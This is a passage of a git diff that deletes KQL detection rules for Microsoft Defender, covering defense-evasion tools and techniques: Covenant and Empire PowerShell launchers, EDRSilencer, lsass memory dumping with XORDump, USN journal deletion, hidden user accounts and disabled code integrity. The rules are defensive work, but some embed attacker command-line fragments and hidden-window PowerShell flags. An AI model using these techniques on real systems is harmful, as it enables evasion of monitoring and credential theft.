-| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Fsutil_Suspicious_Invocation.kql b/Defense Evasion/Fsutil_Suspicious_Invocation.kql
deleted file mode 100644
index a4ffc9ee..00000000
--- a/Defense Evasion/Fsutil_Suspicious_Invocation.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ecco, E.M. Anhaus, oscd.community
-// Date: 2019/09/26
-// Level: high
-// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485
-DeviceProcessEvents
-| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Gpscript_Execution.kql b/Defense Evasion/Gpscript_Execution.kql
deleted file mode 100644
index c9be70bc..00000000
--- a/Defense Evasion/Gpscript_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/16
-// Level: medium
-// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc"))
\ No newline at end of file
diff --git a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql b/Defense Evasion/Greedy_File_Deletion_Using_Del.kql
deleted file mode 100644
index f7cc425a..00000000
--- a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113 , X__Junior (Nextron Systems)
-// Date: 2021/12/02
-// Level: medium
-// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/HH.EXE_Execution.kql b/Defense Evasion/HH.EXE_Execution.kql
deleted file mode 100644
index 2152b61e..00000000
--- a/Defense Evasion/HH.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
-// Date: 2019/10/24
-// Level: low
-// Description: Detects the execution of "hh.exe" to open ".chm" files.
-// Tags: attack.defense_evasion, attack.t1218.001
-DeviceProcessEvents
-| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql b/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql
deleted file mode 100644
index 10ec08bc..00000000
--- a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020/06/04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
deleted file mode 100644
index bc2833d5..00000000
--- a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql b/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql
deleted file mode 100644
index 1570339a..00000000
--- a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/07
-// Level: critical
-// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql b/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql
deleted file mode 100644
index 2186bbd5..00000000
--- a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: @gott_cyber
-// Date: 2024/01/02
-// Level: high
-// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
deleted file mode 100644
index a4dbd554..00000000
--- a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco
-// Date: 2019/08/30
-// Level: critical
-// Description: Detects some Empire PowerShell UAC bypass methods
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql b/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql
deleted file mode 100644
index fc12c1e8..00000000
--- a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alfie Champion (ajpc500)
-// Date: 2021/06/02
-// Level: critical
-// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql b/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql
deleted file mode 100644
index 7fbc35fb..00000000
--- a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/05
-// Level: high
-// Description: Detects the execution GMER tool based on image and hash fields.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\gmer.exe" or (MD5 =~ "e9dc058440d321aa17d0600b3ca0ab04" or SHA1 =~ "539c228b6b332f5aa523e5ce358c16647d8bbe57" or SHA256 =~ "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173") or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_PowerTool_Execution.kql b/Defense Evasion/HackTool_-_PowerTool_Execution.kql
deleted file mode 100644
index c9ca0ad1..00000000
--- a/Defense Evasion/HackTool_-_PowerTool_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/29
-// Level: high
-// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
deleted file mode 100644
index 90d50234..00000000
--- a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql b/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql
deleted file mode 100644
index 76d6ce50..00000000
--- a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/07
-// Level: high
-// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql b/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql
deleted file mode 100644
index 38bdaaa1..00000000
--- a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/27
-// Level: high
-// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql b/Defense Evasion/HackTool_-_Stracciatella_Execution.kql
deleted file mode 100644
index fbafb340..00000000
--- a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a"))
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_WinPwn_Execution.kql b/Defense Evasion/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Defense Evasion/HackTool_-_WinPwn_Execution.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql
deleted file mode 100644
index 68ddb59a..00000000
--- a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/08
-// Level: high
-// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
-// Tags: attack.defense_evasion, attack.lateral_movement
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_XORDump_Execution.kql b/Defense Evasion/HackTool_-_XORDump_Execution.kql
deleted file mode 100644
index e4c4bc39..00000000
--- a/Defense Evasion/HackTool_-_XORDump_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/28
-// Level: high
-// Description: Detects suspicious use of XORDump process memory dumping utility
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ")
\ No newline at end of file
diff --git a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql b/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql
deleted file mode 100644
index 95c4232d..00000000
--- a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/26
-// Level: high
-// Description: Detects when the "index" value of a scheduled task is modified from the registry
-Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql b/Defense Evasion/Hiding_Files_with_Attrib.exe.kql
deleted file mode 100644
index e50cf89e..00000000
--- a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects usage of attrib.exe to hide files from users.
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql b/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql
deleted file mode 100644
index 35550a8f..00000000
--- a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/07/12
-// Level: high
-// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
-// Tags: attack.defense_evasion, attack.t1564.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
\ No newline at end of file
diff --git a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql b/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql
deleted file mode 100644
index c02daff0..00000000
--- a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2023/03/14
-// Level: high
-// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql
deleted file mode 100644
index 8d85ed8d..00000000
--- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https")
\ No newline at end of file
diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
deleted file mode 100644
index 914b3568..00000000
--- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql b/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql
deleted file mode 100644
index eb074d5f..00000000
--- a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/16
-// Level: medium
-// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql b/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql
deleted file mode 100644
index bb522faa..00000000
--- a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/09/02
-// Level: medium
-// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
-
-// Tags: attack.command_and_control, attack.defense_evasion, attack.t1218, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Imports_Registry_Key_From_a_File.kql b/Defense Evasion/Imports_Registry_Key_From_a_File.kql
deleted file mode 100644
index bc1d23a1..00000000
--- a/Defense Evasion/Imports_Registry_Key_From_a_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects the import of the specified file to the registry with regedit.exe.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql b/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql
deleted file mode 100644
index 7ba7ccb4..00000000
--- a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ")))
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
deleted file mode 100644
index 786d5065..00000000
--- a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: A. Sungurov , oscd.community
-// Date: 2020/10/12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql
deleted file mode 100644
index cce1ac92..00000000
--- a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/15
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
